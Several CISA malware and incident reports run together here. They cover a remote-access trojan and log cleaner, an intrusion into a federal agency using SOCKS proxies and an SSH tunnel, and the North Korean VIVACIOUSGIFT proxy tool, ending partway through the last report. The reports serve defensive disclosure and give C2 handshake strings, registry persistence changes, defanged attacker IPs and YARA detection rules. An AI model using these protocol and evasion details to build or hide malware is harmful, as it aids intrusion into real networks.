Product Version 1.0.0.1
PE Sections
MD5 Name Raw Size Entropy
faf4cd402ffdb84551c382ea45f2f893 header 1024 2.514929
7e3095c827af75a349f3c206925932cd .text 31232 6.493665
614ccbacb5de6dae94b6af93aa5a83fc .rdata 8192 5.232371
543ffbd535401feb9f37c585d9f161f3 .data 1536 4.679413
7c1584feb039309d7a4307c39adaa54f .rsrc 1024 2.333786
79345fb74e56359cd6eb957ceb52e0ab .reloc 3072 4.519356
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
927d945476… Dropped_By 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273
Description

This file is a 32-bit Windows executable file that is dropped and executed by 448838B2A60484EE78C2198F2C0C9C85. The file is called ‘mediaplayer.exe’. When executed, it will look for a file called ‘Junk9’ and will attempt to delete it. The file ‘Junk9’ was not available for analysis. Next, it will take a screenshot of the user’s desktop and name it ‘Filter3.jpg’ and store this in the local directory. The program then looks for a service called ‘TaskFrame’ and attempts to start it. The ‘TaskFrame’ service is able to delete, add, or modify registry keys, and start and stop a keylogger program on the system. If the ‘TaskFrame’ service is already installed and running the program will terminate.

The malware will create a mutex on the system called ‘Globalmukimukix’. The program changes the proxy configuration of the system with the following registry modifications:

— Begin Registry Modification —
HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZoneMap
   Name: ProxyBypass    Value: 1
HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZoneMap
Name: IntranetName Value: 1
HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZoneMap
Name: UNCAsIntranet Value: 1
— End Registry Modification —

The program collects the computer name, user name, OS version, adapter information, memory usage, and logical drives for the system. This information is concatenated into a string that is hashed and sent as part of the initial POST request to the C2. The program will expect to receive a ‘200 OK’ response from the C2 before it begins transmission. If it receives a ‘501 Error’ the program sleeps for three seconds and attempts another connection. If the initial connection to the C2 is successful, the program will await a command. The program is capable of executing the following tasks from commands issued by the C2:

— Begin Program Capabilities —

1. Create, Write, and Delete files.
2. Open a Command Line.
3. Move Files.
4. Enumerate Open Ports.
5. Enumerate Drives.
6. Enumerate Processes by ID, Name, or Privileges.
7. Start and Stop Processes.
8. Enumerate Files and Directories.
9. Open a Named Pipe and Send and Receive Data.
10. Take Screenshots.
11. Inject into User Processes.
12. Enumerate Services.
13. Start/Stop Services.
14. Modify the Registry.
15. Open/Close TCP and UDP Sessions.

— End Program Capabilities —

The program will also look for the following paths: SetupUi, AppIni, and ExtInfo. The purpose for this search could not be determined.

4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa

Tags

remote-access-trojan

Details
Name wHPEO.exe
Size 7168 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 92a40c64cea4a87de1c24437612f2e0f
SHA1 f52f0685a72d6a8f3e119ce92b7cf1c2c6a83bb9
SHA256 4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa
SHA512 d0714d09dcac070eb8d0971e953ce0c0382658d5682982a8045dcf29da9a729be57dc7d60c4e18f1833966f6c6584e9a883871eef8d1c9f9d3b5dd100c69b9a4
ssdeep 192:DcTrBTVdZzgW+mpWpc9aThFJJRmqSA9iu:c7EmpWpc9aThFVviu
Entropy 5.395407
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2017-12-04 08:14:24-05:00
Import Hash 6ab19ee53c87a04ccb965f5f658b717a
PE Sections
MD5 Name Raw Size Entropy
d6cd352d657372b25707fed98bc3bd0b header 1024 2.379332
c036d2e814490871e54dd84e8117e044 .text 2560 5.788179
2f2819452977bcfd6dcac4389a2cd193 .rdata 1536 4.849405
afadce14c7f045a0390158515331a054 .data 512 1.342806
554d0cedd69e96ee00c8324ce4da604c .rsrc 1024 5.194460
ed7fec6ad28b233df4676dad7f306c3c .reloc 512 4.741130
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
4186b5beb5… Dropped_By 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273
Description

This artifact is a 32-bit Windows executable that is dropped by 448838B2A60484EE78C2198F2C0C9C85. This program has some anti-forensic capability and is designed to clear indicators of compromise (IOCs) from the system. The program first verifies that the service ‘TaskFrame’ is running then adds the following key to the registry:

— Begin Registry Modification —
HKLMSystemCurrentControlSetControlSessionManagerPendingFileRenameOperations
Data: ??C:Users<user>AppDataLocalTempwHPEO.exe
— End Registry Modification —

This modification insures that the file is deleted with the next system restart. The program will also delete the user’s ‘index.dat’ file thus removing the user’s recent Internet history from the system.

Relationship Summary

64d78eec46… Dropped 4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa
64d78eec46… Connected_To sdvro.net
64d78eec46… Dropped 927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae
sdvro.net Connected_From 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273
927d945476… Dropped_By 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273
4186b5beb5… Dropped_By 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Revisions

  • October 1, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: September 24, 2020

Summary

This Analysis Report uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor tactics and techniques.

The Cybersecurity and Infrastructure Security Agency (CISA) responded to a recent threat actor’s cyberattack on a federal agency’s enterprise network. By leveraging compromised credentials, the cyber threat actor implanted sophisticated malware—including multi-stage malware that evaded the affected agency’s anti-malware protection—and gained persistent access through two reverse Socket Secure (SOCKS) proxies that exploited weaknesses in the agency’s firewall.

For a downloadable copy of IOCs, see: AA20-268A.stix.

Description

CISA became aware—via EINSTEIN, CISA’s intrusion detection system that monitors federal civilian networks—of a potential compromise of a federal agency’s network. In coordination with the affected agency, CISA conducted an incident response engagement, confirming malicious activity. The following information is derived exclusively from the incident response engagement and provides the threat actor’s tactics, techniques, and procedures as well as indicators of compromise that CISA observed as part of the engagement.

Threat Actor Activity

The cyber threat actor had valid access credentials for multiple users’ Microsoft Office 365 (O365) accounts and domain administrator accounts, which they leveraged for Initial Access [TA0001] to the agency’s network (Valid Accounts [T1078]). First the threat actor logged into a user’s O365 account from Internet Protocol (IP) address 91.219.236[.]166 and then browsed pages on a SharePoint site and downloaded a file (Data from Information Repositories: SharePoint [T1213.002]). The cyber threat actor connected multiple times by Transmission Control Protocol (TCP) from IP address 185.86.151[.]223 to the victim organization’s virtual private network (VPN) server (Exploit Public-Facing Application [T1190]).

CISA analysts were not able to determine how the cyber threat actor initially obtained the credentials. It is possible the cyber actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability—CVE-2019-11510—in Pulse Secure (Exploitation for Credential Access [T1212]). In April 2019, Pulse Secure released patches for several critical vulnerabilities—including CVE-2019-11510, which allows the remote, unauthenticated retrieval of files, including passwords.[1] CISA has observed wide exploitation of CVE-2019-11510 across the federal government.[2]

After initial access, the threat actor performed Discovery [TA0007] by logging into an agency O365 email account from 91.219.236[.]166 and viewing and downloading help desk email attachments with “Intranet access” and “VPN passwords” in the subject line, despite already having privileged access (Email Collection [T1114], Unsecured Credentials: Credentials In Files [T1552.001]). (Note: these emails did not contain any passwords.) The actor logged into the same email account via Remote Desktop Protocol (RDP) from IP address 207.220.1[.]3 (External Remote Services [T1133]). The actor enumerated the Active Directory and Group Policy key and changed a registry key for the Group Policy (Account Manipulation [T1098]). Immediately afterward, the threat actor used common Microsoft Windows command line processes—conhost, ipconfig, net, query, netstat, ping, and whoami, plink.exe—to enumerate the compromised system and network (Command and Scripting Interpreter [T1059], System Network Configuration Discovery [T1016]).

The cyber threat actor then attempted multiple times to connect to virtual private server (VPS) IP 185.86.151[.]223 through a Windows Server Message Block (SMB) client. Although they connected and disconnected multiple times, the connections were ultimately successful. During the same period, the actor used an alias secure identifier account they had previously created to log into VPS 185.86.151[.]223 via an SMB share. The attacker then executed plink.exe on a victim file server (Command and Scripting Interpreter [T1059]). (plink.exe is a command-line version of PuTTy that is used for remote administration.)

The cyber threat actor established Persistence [TA0003] and Command and Control [TA0011] on the victim network by (1) creating a persistent Secure Socket Shell (SSH) tunnel/reverse SOCKS proxy, (2) running inetinfo.exe (a unique, multi-stage malware used to drop files), and (3) setting up a locally mounted remote share on IP address 78.27.70[.]237 (Proxy [T1090]). The mounted file share allowed the actor to freely move during its operations while leaving fewer artifacts for forensic analysis. Refer to Threat Actor Malware section for more information about the SSH Tunnel/reverse SOCKS proxy and inetinfo.exe.

The cyber threat actor created a local account, which they used for data Collection [TA0009], Exfiltration [TA0010], Persistence [TA0003], and Command and Control [TA0011] (Create Account [T1136]). The cyber threat actor used the local account to:

  • Browse directories on a victim file server (Data from Shared Network Drive [T1039]).
  • Copy a file from a user’s home directory to their locally mounted remote share (Data Staged [T1074]).
    • CISA analysts detected the cyber threat actor interacting with other files on users’ home directories but could not confirm whether they were exfiltrated.
  • Create a reverse SMB SOCKS proxy that allowed connection between an cyber threat actor-controlled VPS and the victim organization’s file server (refer to Threat Actor Malware section for more information) (Proxy [T1090]).
  • Interact with PowerShell module Invoke-TmpDavFS.psm (refer to Threat Actor Malware section for more information).
  • Exfiltrate data from an account directory and file server directory using tsclient (tsclient is a Microsoft Windows Terminal Services client) (Data from Local System [T1005], Data from Network Shared Drive [T1039]).
  • Create two compressed Zip files with several files and directories on them (Archive Collected Data [T1560]); it is likely that the cyber threat actor exfiltrated these Zip files, but this cannot be confirmed because the actor masked their activity.

See figure 1 for the sequence of the cyber threat actor’s tactics and techniques.

Figure 1: Cyber threat actor tactics and techniques

Threat Actor Malware

Persistent SSH Tunnel/Reverse SOCKS Proxy

While logged in as “Administrator,” the cyber threat actor created two Scheduled Tasks (see table 1) that worked in concert to establish a persistent SSH tunnel and reverse SOCKS proxy. The proxy allowed connections between an attacker-controlled remote server and one of the victim organization’s file servers (Scheduled Task/Job [T1053], Proxy [T1090]). The Reverse SOCKS Proxy communicated through port 8100 (Non-Standard Port [T1571]). This port is normally closed, but the attacker’s malware opened it.

Table 1: Scheduled Tasks composing SSH tunnel and reverse SOCKS proxy

Scheduled Task Description
ShellExperienceHost.exe

This task created a persistent SSH tunnel to attacker-controlled remote server 206.189.18[.]189 and employed port forwarding to allow connections from the remote server port 39999 to the victim file server through port 8100. This task was run daily.

ShellExperienceHost.exe is a version of plink.exe, a command-line version of PuTTy that is used for remote administration.

WinDiag.exe

This task is a reverse SOCKS proxy that is preconfigured to bind to and listen on TCP port 8100. WinDiag.exe received responses through the SSH tunnel and forwarded the responses through port 8100 to the VPS IP address 185.193.127[.]17 over port 443. This task was run on boot.

WinDiag.exe had compile information that matched the VPS login name

Dropper Malware: inetinfo.exe

The threat actor created a Scheduled Task to run inetinfo.exe (Scheduled Task/Job [T1053]). inetinfo.exe is a unique, multi-stage malware used to drop files (figure 2). It dropped system.dll and 363691858 files and a second instance of inetinfo.exe. The system.dll from the second instance of inetinfo.exe decrypted 363691858 as binary from the first instance of inetinfo.exe. The decrypted 363691858 binary was injected into the second instance of inetinfo.exe to create and connect to a locally named tunnel. The injected binary then executed shellcode in memory that connected to IP address 185.142.236[.]198, which resulted in download and execution of a payload.

Figure 2: Dropper malware inetinfo.exe

The cyber threat actor was able to overcome the agency’s anti-malware protection, and inetinfo.exe escaped quarantine. CISA analysts determined that the cyber threat actor accessed the anti-malware product’s software license key and installation guide and then visited a directory used by the product for temporary file analysis. After accessing this directory, the cyber threat actor was able to run inetinfo.exe (Impair Defenses: Disable or Modify Tools [T1562.001]).

Reverse SMB SOCKS Proxy

PowerShell script HardwareEnumeration.ps1 created a reverse SMB SOCKS proxy that allowed connection between attacker-controlled VPS IP 185.193.127[.]18 and the victim organization’s file server over port 443 (Command and Scripting Interpreter: Power Shell [T1059.001], Proxy [T1090]). PowerShell script HardwareEnumeration.ps1 was executed daily via a Scheduled Task (Scheduled Task/Job [T1053]).

HardwareEnumeration.ps1 is a copy of Invoke-SocksProxy.ps1, a free tool created and distributed by a security researcher on GitHub.[3] Invoke-SocksProxy.ps1 creates a reverse proxy from the local machine to attacker infrastructure through SMB TCP port 445 (Non-Standard Port [T1571]). The script was likely altered with the cyber threat actor’s configuration needs.

PowerShell Module: invoke-TmpDavFS.psm

invoke-TmpDavFS.psm is a PowerShell module that creates a Web Distributed Authoring and Versioning (WebDAV) server that can be mounted as a file system and communicates over TCP port 443 and TCP port 80. invoke-TmpDavFS.psm is distributed on GitHub.[4]

Solution

Indicators of Compromise

CISA analysts identified several IP addresses involved in the multiple stages of the outlined attack.

  • 185.86.151[.]223 – Command and Control (C2)
  • 91.219.236[.]166 – C2
  • 207.220.1[.]3 – C2
  • 78.27.70[.]237 – Data Exfiltration
  • 185.193.127[.]18 – Persistence

Monitor Network Traffic for Unusual Activity

CISA recommends organizations monitor network traffic for the following unusual activity.

  • Unusual open ports (e.g., port 8100)
  • Large outbound files
  • Unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP)

If network defenders note any of the above activity, they should investigate.

Prevention

CISA recommends organizations implement the following recommendations to protect against activity identified in this report.

Deploy an Enterprise Firewall

Organizations should deploy an enterprise firewall to control what is allowed in and out of their network.

If the organization chooses not to deploy an enterprise firewall, they should work with their internet service provider to ensure the firewall is configured properly.

Block Unused Ports

Organizations should conduct a survey of the traffic in and out of their enterprise to determine the ports needed for organizational functions. They should then configure their firewall to block unnecessary ports. Organization should develop a change control process to make control changes to those rules. Of special note, unused SMB, SSH, and FTP ports should be blocked.

Additional Recommendations

CISA recommends organizations implement the following best practices.

  • Implement multi-factor authentication, especially for privileged accounts.
  • Use separate administrative accounts on separate administration workstations.
  • Implement the principle of least privilege on data access.
  • Secure RDP and other remote access solutions using multifactor authentication and “jump boxes” for access.
  • Deploy and maintain endpoint defense tools on all endpoints.
  • Keep software up to date.

References

Revisions

  • September 24, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: August 26, 2020

Description

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Department of Homeland Security (DHS), the Federal Bureau of Investigation (FBI), and the Department of Defense (DoD). Working with U.S. Government partners, DHS, FBI, and DoD identified Remote Access Tool (RAT) malware variants used by the North Korean government. This malware variant has been identified as VIVACIOUSGIFT. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https[:]//www[.]us-cert.gov/hiddencobra.

FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. DHS, FBI, and DoD are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity.

This MAR includes malware descriptions related to HIDDEN COBRA, suggested response actions and recommended mitigation techniques. Users or administrators should flag activity associated with the malware and report the activity to the Cybersecurity and Infrastructure Security Agency (CISA) or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.

This report looks at the malware samples known as VIVACIOUSGIFT that is used by advanced persistent threat (APT) cyber actors as a network proxy tool. The proxy requires an encrypted command line argument for its source and destination Internet Protocol (IP) addresses and has command and control (C2) functionality to retrieve and set the destination IP. The command line argument can also contain a source proxy IP, port, and password. The source proxy is used as an additional proxy when communicating with the source IP. The library libcurl version 7.94.1 is used when communicating with the source proxy.

For a downloadable copy of IOCs, see [STIX file].

Submitted Files (6)

70b494b0a8fdf054926829dcb3235fc7bd0346b6a19faf2a57891c71043b3b38 (70b494b0a8fdf054926829dcb3235f…)

8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1 (8cad61422d032119219f465331308c…)

9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852 (9a776b895e93926e2a758c09e341ac…)

a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118 (a917c1cc198cf36c0f2f6c24652e5c…)

aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83 (aca598e2c619424077ef8043cb4284…)

f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de (f3ca8f15ca582dd486bd78fd57c2f4…)

Findings

a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118

Tags

HIDDEN-COBRAproxytrojan

Details
Name a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118
Size 408576 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 40e698f961eb796728a57ddf81f52b9a
SHA1 50b4f9a8fa6803f0aabb6fd9374244af40c2ba4c
SHA256 a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118
SHA512 2ee35d902f2a4022488bdc75cf7531f75de7e8bb4ca8645a9448f33051e835f0cea62e0157ac292187cd9406901f80570b8e17be52fee4a23f3c1aaa1a171cda
ssdeep 12288:E30MB7N+man4IrT0qhPyRg8o//ND6lAMYqcl:i0YNwrT0qhPFtHN2lLYq
Entropy 6.651902
Antivirus
Ahnlab Trojan/Win32.Banker
Antiy Trojan[Banker]/Win32.Agent
Avira TR/SpyBanker.Agent.AM
BitDefender Trojan.GenericKD.4446633
ClamAV Win.Trojan.Agent-6971031-0
Comodo TrojWare.Win32.Ransom.Teerac.C
Cyren W32/Banker.FTBC-3937
ESET Win32/Spy.Banker.ADRO trojan
Emsisoft Trojan.GenericKD.4446633 (B)
Ikarus Trojan-Spy.Banker
K7 Riskware ( 0040eff71 )
Lavasoft Trojan.GenericKD.4446633
McAfee Generic.abb
Microsoft Security Essentials TrojanSpy:Win32/Banker
NANOAV Trojan.Win32.Agent.enikaf
Quick Heal TrojanSpy.Banker
Sophos Mal/Generic-L
Symantec Trojan Horse
TrendMicro BKDR_KL.89AB2FB2
TrendMicro House Call BKDR_KL.89AB2FB2
Vir.IT eXplorer Trojan.Win32.Banker.FUW
VirusBlokAda TrojanBanker.Agent
Zillya! Trojan.Agent.Win32.763316
YARA Rules
  • rule CISA_3P_10301706_02 : HiddenCobra TWOPENCE backdoor dropper proxy spyware trojan
    {
       meta:
           Author = “CISA Trusted Third Party”
           Incident = “10301706.r2.v1”
           Date = “2020-08-11”
           Actor = “Hidden Cobra”
           Category = “Backdoor Dropper Proxy Spyware Trojan”
           Family = “TWOPENCE”
           Description = “Detects strings in TWOPENCE proxy tool”
           MD5_1 = “40e698f961eb796728a57ddf81f52b9a”
           SHA256_1 = “a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118”
           MD5_2 = “dfd09e91b7f86a984f8687ed6033af9d”
           SHA256_2 = “aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83”
           MD5_3 = “bda82f0d9e2cb7996d2eefdd1e5b41c4”
           SHA256_3 = “f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de”
           MD5_4 = “97aaf130cfa251e5207ea74b2558293d”
           SHA256_4 = “9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852”
           MD5_5 = “889e320cf66520485e1a0475107d7419”
           SHA256_5 = “8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1”
       strings:
           $cmd1 = “ssylka”
           $cmd2 = “ustanavlivat”
           $cmd3 = “poluchit”
           $cmd4 = “pereslat”
           $cmd5 = “derzhat”
           $cmd6 = “vykhodit”
           $cmd7 = “Nachalo”
           $cmd8 = “kliyent2podklyuchit”
           $frmt1 = “Host: %s%s%s:%hu”
           $frmt2 = “%s%s%s%s%s%s%s%s%s%s”
       condition:
           (4 of ($cmd*)) and (1 of ($frmt*))
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2016-07-08 19:11:36-04:00
Import Hash 3415ed7e09a44243bcabe4422aeef7dc
PE Sections
MD5 Name Raw Size Entropy
0e135280ecde05507a86c5681ee38986 header 1024 2.480337
dfcc176fede07939cc4deb950858b6ce .text 333824 6.579572
d72f6b9398a7f267dfe5f1bd44778d62 .rdata 51712 6.391152
1e41f003bafe97cb5bfb59b3ad7d7531 .data 6656 3.459925
a8d51b81460671e8fb3df438f0f7fc28 .reloc 15360 5.531184
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Description

This file is a 32-bit Windows executable. The proxy requires a single command line argument. The argument can consist of a maximum of four encrypted strings delineated with the pipe character (“|”). When the four strings are parsed and decrypted, the strings represent the following: source IP and port, destination IP and port, source proxy IP and port, and source proxy password. The IP and port strings have the following format: <IP:port>. If the destination IP is missing from the command line argument, the proxy will wait to get the destination IP from the actor. The source proxy IP and port, as well as the source proxy password, are used as an additional proxy when communicating with the source IP. When communicating with the source proxy, the proxy will use libcurl with the options CURLOPT_HTTPPROXYTUNNEL and CURLOPT_NOBODY.

The following is an example of an encrypted command line argument that is missing the destination IP:

–Begin encrypted command line argument–
<encrypted_string>| |<encrypted_string>|<encrypted_string>
–End encrypted command line argument–

–Begin decrypted command line argument–
<IP>:<port>| |<IP>:<port>|<password>
–End decrypted command line argument–

The encrypted strings inside the command line argument can be individually decrypted with the Python script provided in Figure 1.

Below is the flow of events that happens when the proxy starts and is issued the commands “ustanavlivat” and “pereslat”. In the following example, the command line argument does not contain a source proxy. The command line argument can contain a source proxy IP, port, and password. If they exist, the proxy will route all traffic to the source IP through the source proxy. When communicating with the source proxy, the proxy uses the library libcurl with options CURLOPT_HTTPPROXYTUNNEL and CURLOPT_NOBODY. The data that is sent and received is encrypted using a custom encryption routine.

First, it connects to source IP and sends initialization message “Nachalo”. It sends a custom hash of “Dazdrav$958478Zohsf9q@%5555ahshdnZXniohs”. In return it receives two bytes of data. It sends the length (4 bytes) of string “kliyent2podklyuchit” and then sends the string “kliyent2podklyuchit”. It sends the length (4 bytes) of string “Nachalo” and then sends the “Nachalo”.

Next, it receives C2 command “ustanavlivat” to set the destination IP address. It receives and decrypts the length of the string “ustanavlivat” and then receives and decrypts the string “ustanavlivat”.

Then, it receives C2 command “pereslat” to start the proxy functionality. It receives and decrypts the length of the string “pereslat” and then receives and decrypts the string “pereslat”.

Next, it connects to source IP and sends start proxy functionality message “ssylka”. It sends a custom hash of “Dazdrav$958478Zohsf9q@%5555ahshdnZXniohs”. In response it receives data. Then it sends the length (4 bytes) of string “kliyent2podklyuchit” and then sends the string “kliyent2podklyuchit”. Then it sends the length (4 bytes) of string “ssylka” and then sends the string “ssylka”.

Finally, it connects to destination IP and starts proxy functionality between source and destination IP.

The proxy uses a custom encryption routine to encode the data sent. The Python script provided in Figure 2 can decode the data.

Screenshots

Figure 1 - The Python script to individually decrypt the encrypted strings inside the command line argument.

Figure 1 – The Python script to individually decrypt the encrypted strings inside the command line argument.

Figure 2 - The Python script to decode the encoded data sent by the proxy custom encryption routine.

Figure 2 – The Python script to decode the encoded data sent by the proxy custom encryption routine.

aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83

Tags

HIDDEN-COBRAdropperproxyspywaretrojan

Details
Name aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83
Size 232960 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 dfd09e91b7f86a984f8687ed6033af9d
SHA1 b8fe7884d2dc4983fb0fbca192694ce2f4685e23
SHA256 aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83
SHA512 641dd95c101ae7566defb1a24279badb8c7aa94331442e0f470866b6a1e44c8790a71e83cc1cb188d7530c08bf0e5d227d35caa9a2cf7e54d2f7319381af2d84
ssdeep 3072:XU5r72JE+FYWR0jZLShk4cPT/QzSaQ0sCFneZTznIhZJJcrJ1GHeV9:XU5uJpYnZL05STQNddFnAnGZIrV
Entropy 6.524225
Antivirus
Ahnlab Trojan/Win32.Alreay
Antiy Trojan[Banker]/Win32.Alreay
ClamAV Win.Trojan.Agent-6971031-0
Comodo TrojWare.Win32.TrojanDropper.Agent.PRQ
Cyren W32/Alreay.SQQX-6406
ESET a variant of Win32/Spy.Banker.ADRO trojan
K7 Spyware ( 005198041 )
McAfee GenericRXFQ-MX!DFD09E91B7F8
Microsoft Security Essentials TrojanSpy:Win32/Banker!dha
Symantec Trojan Horse
TrendMicro TSPY_BA.C25E7684
TrendMicro House Call TSPY_BA.C25E7684
Zillya! Trojan.Alreay.Win32.42
YARA Rules
  • rule CISA_3P_10301706_02 : HiddenCobra TWOPENCE backdoor dropper proxy spyware trojan
    {
       meta:
           Author = “CISA Trusted Third Party”
           Incident = “10301706.r2.v1”
           Date = “2020-08-11”
           Actor = “Hidden Cobra”
           Category = “Backdoor Dropper Proxy Spyware Trojan”
           Family = “TWOPENCE”
           Description = “Detects strings in TWOPENCE proxy tool”
           MD5_1 = “40e698f961eb796728a57ddf81f52b9a”
           SHA256_1 = “a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118”
           MD5_2 = “dfd09e91b7f86a984f8687ed6033af9d”
           SHA256_2 = “aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83”
           MD5_3 = “bda82f0d9e2cb7996d2eefdd1e5b41c4”
           SHA256_3 = “f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de”
           MD5_4 = “97aaf130cfa251e5207ea74b2558293d”
           SHA256_4 = “9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852”
           MD5_5 = “889e320cf66520485e1a0475107d7419”
           SHA256_5 = “8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1”
       strings:
           $cmd1 = “ssylka”
           $cmd2 = “ustanavlivat”
           $cmd3 = “poluchit”
           $cmd4 = “pereslat”
           $cmd5 = “derzhat”
           $cmd6 = “vykhodit”
           $cmd7 = “Nachalo”
           $cmd8 = “kliyent2podklyuchit”
           $frmt1 = “Host: %s%s%s:%hu”
           $frmt2 = “%s%s%s%s%s%s%s%s%s%s”
       condition:
           (4 of ($cmd*)) and (1 of ($frmt*))
    }
ssdeep Matches
99 9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852
PE Metadata
Compile Date 2016-09-18 23:24:39-04:00
Import Hash 6b8fa355d78d649f199232a25e22d630
PE Sections
MD5 Name Raw Size Entropy
41a5273e6d92dfe9de72f76c18f6475f header 1024 2.398805
e6412e7fb561ead2b3eddef9bafd3518 .text 198656 6.554337
a9890fd54b24cf53425649a92fe290ad .rdata 18432 5.115959
884e0d48d1830995eeade874d295ced0 .data 5632 3.201975
0e79f25ba5ec9ae1502fe80ec7b08f79 .reloc 9216 5.674607
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Description

This file is a 32-bit Windows executable. It has similar functionality as a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118.

f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de

Tags

HIDDEN-COBRAproxytrojan

Details
Name f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de
Size 265216 bytes
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 bda82f0d9e2cb7996d2eefdd1e5b41c4
SHA1 9ff715209d99d2e74e64f9db894c114a8d13229a
